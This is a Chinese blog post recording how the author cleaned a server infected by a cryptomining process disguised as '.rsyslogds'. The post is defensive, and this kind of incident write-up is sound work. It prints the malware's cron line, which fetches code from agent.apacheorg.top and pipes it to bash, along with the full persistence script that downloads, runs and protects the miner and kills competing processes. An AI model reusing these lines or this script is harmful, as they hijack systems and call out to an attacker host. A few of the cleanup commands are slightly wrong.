服务器中.rsyslogds病毒处理过程(别被病毒地址agent.apacheorg.top蒙骗了,它不是真的apache)

于 2021-12-06 11:06:23 发布
阅读量1.5k 收藏
点赞数
分类专栏: linux 文章标签: 服务器 linux .rsyslogds
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_38800446/article/details/121742032
版权
本文记录了一次服务器资源被大量占用,发现并处理病毒的过程。病毒通过伪装的.rsyslogds进程消耗CPU,创建定时任务下载并执行恶意脚本。清理过程包括终止病毒进程,删除相关文件,清理定时任务,并查找其他可能的感染源。同时提供了查找相关文件的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

突然收到通知说线上有服务不可用了……,赶紧丢下手头的活计检查问题

经检查是由于服务器突然资源被占用,导致本该正常服务的进程都被占用关闭了,并且cpu进程被占用到 了100%。
遇到事情先不要慌,使用top命令,用大写的P使进程按cpu排序检查,发现有很多个.rsyslogds进程排在前列,资源占用前十名都是它。
本来还以为是日志进程,后来发现处理不了才意识到是病毒文件。处理过程记录如下:

1. 首先把当前的病毒进程干掉

pkill -p .rsyslogds

检查是否还有病毒进程存在

ps -f | grep .rsyslogds

(这一步在后续的过程中依然可以运行检查,以防操作过程正是病毒运行复制的过程)

2. 找到启动脚本

先在top中定位到进程的pid,使用ls -al /proc/PID命令找到对应目录。
而这个进程文件在/usr/sbin目录下,使用ls -al /usr/sbin命令可以看到其下有.rsyslogds.rsyslogds.sh两个文件,需要先把他们两个删掉;

如果有当前文件的写命令,但是却提示permission denied,那么可以运行chattr -ai 文件名后再进行删除。

3. 清理病毒定时任务

这里我就是被这个文件名以及里面的文件内容伪装欺骗了
在这里插入图片描述
其实这里的apache、nginx、root文件都是病毒文件,里面都有如下语句

30 23 * * * (curl -s http://agent.apacheorg.top:1234/xmss||wget -q -O - http://agent.apacheorg.top:1234/xmss )|bash -sh

需要把这些病毒文件都删除掉。

然后使用crontab -l检查当前的定时任务
执行crontab -e,把里面的定时任务删掉。

4. 再继续检查

在0hourly下有使用,因此再继续检查/var/spool/anacron/cron.daily/usr/bin/on_ac_power

#!/bin/sh
# Check whether 0anacron was run today already
if test -r /var/spool/anacron/cron.daily; then
    day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
    exit 0;
fi

# Do not run jobs when on battery power
if test -x /usr/bin/on_ac_power; then
    /usr/bin/on_ac_power >/dev/null 2>&1
    if test $? -eq 1; then
    exit 0
    fi
fi
/usr/sbin/anacron -s

vi /var/spool/cron/crontabs/root发现还是有这个内容

30 23 * * * (curl -s http://agent.apacheorg.top:1234/xmss||wget -q -O - http://agent.apacheorg.top:1234/xmss )|bash -sh

编辑删除当前行。
vi /usr/sbin/.inis这个文件内也有,删除这个文件

#!/bin/bash
if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
echo $DLB
if [ -w /usr/sbin ]; then
  SPATH=/usr/sbin
else
  SPATH=/tmp
fi
kill(){
  ps aux | grep -v '.rsyslogds' |grep -v '.libs'| grep -v grep | awk '{if($3>50.0) print $2}' | while read procid
  do
    kill -9 $procid
  done
}
while true; do
  ipurl="http://agent.apacheorg.top:1234"
  MD5_1_XMR = `curl -fsSL $ipurl/v||wget -q -O - $ipurl/v`
  MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`
  if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]; then
    if [ $(ps -aux|grep '.rsyslogds'|grep -v grep|wc -l) -eq '0' ];then
      $SPATH/.rsyslogds
    else
      echo "ok"
    fi
  else
    $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
    chattr +ai $SPATH/.rsyslogds
  fi
  kill
  sleep 1m
done

要注意这几个位置

/etc/cron.d/用户名
/etc/cron.d/apache
/var/spool/cron/用户名
/var/spool/cron/crontabs/用户名
/etc/cron.hourly/oanacroner1

5. 附:查找相关文件的办法

# 根据文件名查找
find /usr/ -name *rsyslog*
# 根据文件内容查找
find /usr/ -type f -exec grep -l "apacheorg" {} \;
iru
关注
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值